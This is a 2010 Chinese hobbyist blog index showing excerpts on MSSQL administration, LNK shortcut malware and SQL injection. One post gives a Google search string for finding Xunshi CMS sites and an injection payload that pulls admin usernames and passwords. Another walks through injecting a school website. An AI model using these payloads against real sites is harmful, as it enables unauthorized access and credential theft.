• RainbowSoft Studio Z-Blog
  • RainbowSoft Studio Z-Blog
  • 本站支持WAP访问
  • 订阅本站的 RSS 2.0 新闻聚合

Mail:no-thinking@hotmail.com
Name:No Thinking: QQ:484794
I love to design beautiful and usable CSS websites.Find out more about me here.(The best resolution is 1024*768)

windows快捷方式自动执行0day漏洞攻击

Post by NO.THINKING, 2010-7-24, Views:

昨天看到windows又爆出了一个关于lnk文件的 Zero Day,回家的路上搜索了下脑海中关于桌面快捷方式(LNK文件)有趣的事情,在这里贴出来和大家一起分享


一 LNK文件也可以成为一个木马下载器

1 一封垃圾邮件引发的病毒事件

2009年3月4日,大概是这一天,我拿到了一个台灣為何變窮的样本。具体是某人收到一封垃圾邮件,主题“看看我們的台灣要員是怎麼花納稅人的錢的”,寥 寥数语没意思,而附件的名为台灣為何變窮.lnk的快捷方式似乎没有什么特别的,但是当你查看属性的时候,会看到一些灵异的字符串,而熟悉命令行的将很容 易发现它在干什么
...

Tags: 0day  LNK 

通杀所有讯时系统0day 经本人测试此0day通杀所有讯时系统

Post by NO.THINKING, 2010-5-28, Views:

经测试此0day通杀所有讯时系统。

google关键字inurl:news_more.asp?lm2=


复制 代码

1. /admin/admin_news_pl_view.asp?id=1   //id任意 填入以下语句
2. 有时1显示错误信息的时候继续往后退2,3,4。。。。
3. |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
...

Tags: 讯时  通杀0day  漏洞 

MSSQL权限管理

Post by NO.THINKING, 2010-5-18, Views:

MS SQL Server 权限管理

--先创建一个DEMO数据库
CREATE DATABASE StudentMgr
ON
 (
  NAME = 'StudentMgr_DB_01',
...

Tags: mssql  权限 

Post by NO.THINKING, 2010-5-2, Views:

恩......

请不要催促他们----因为你在慢慢长大,而他们却在慢慢变老.......

Tags:   父母  年老 

在图形界面下,可以用事件探查器来跟踪sql server,多用在调试程序的时候,我们可以清楚地看到我们的程序向SQL SERVER发送了什么样的语句 ,有错误的话也很容易被发现。

Post by NO.THINKING, 2010-4-6, Views:

在图形界面下,可以用事件探查器来跟踪sql server,多用在调试程序的时候,我们可以清楚地看到我们的程序向SQL SERVER发送了什么样的语句 ,有错误的话也很容易被发现。

如果没有图形界面,可以利用下面的语句来监控整台数据库服务器执行了哪些SQL语句 ,并保存到文件中, HACK中具体有什么作用就各自发挥吧。。要求SA权限。。

...
Tags: sql  mssq  sql server 

MSSQL2005_数据库备份语句整理

Post by NO.THINKING, 2010-3-27, Views:

--完整备份
Backup Database NorthwindCS
To disk='G:\Backup\NorthwindCS_Full_20070908.bak'

--差异备份
Backup Database NorthwindCS
...

Tags: sql  备份数据库 

sql 2005 用户、组或角色 在当前数据库中已存在 无法删除数据库所有用户 解决方法

Post by NO.THINKING, 2010-3-24, Views:

sql server 2005 用户、组或角色 在当前数据库中已存在

问题:1. sql server2005 修改系统表不能修改
       2. 错误信息:sql server 2005 用户、组或角色 在当前数据库中已存在

 

想手工把登录名与数据库中的用户名进行关联, 系统不让; 想删除数据库中的用户再重建, 竟然也不让删……

...
Tags: sql 

总结搜索型手工注入的全过程

Post by NO.THINKING, 2010-3-24, Views:

前段时间朋友丢了一个站过来,说是他们学校的。叫我帮忙检测下。
于是看了下。用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效,
无注入点,手工和工具试过了,防注入,COOKIES注入也不行。找不到程序源码,没办法分析。旁注 ?
整站是独立服务器,就一个站,旁注也没办法。难到要C段?好麻烦哦。丢给群里一些大牛看看,
都说搞不定(应该是没认真看吧。),我大受打击,但是我不放弃,再去看看先。
于是,发现了一个搜索框,直觉告诉我,这就是突破点,果然.....

...
Tags: 注入  搜索型  手工 

SQL手工注入笔记

Post by NO.THINKING, 2010-3-17, Views:

 判断数据库用到的注释符:

                          --    MSSQL注释符    /*    MYSQL注释符  

...
Tags: sql  注入  手工 

经典吵架--张艺谋剧组领盒饭

Post by NO.THINKING, 2010-3-15, Views:

“少个蛋你会死啊!”

                                ————————旁白:会死,会死!

...
Tags:
  • 最新评论
  • 最新留言
  • 热门标签

Hot Articles

Friend Connect

此处加载INCLUDE文件,内容可自定义

Statistics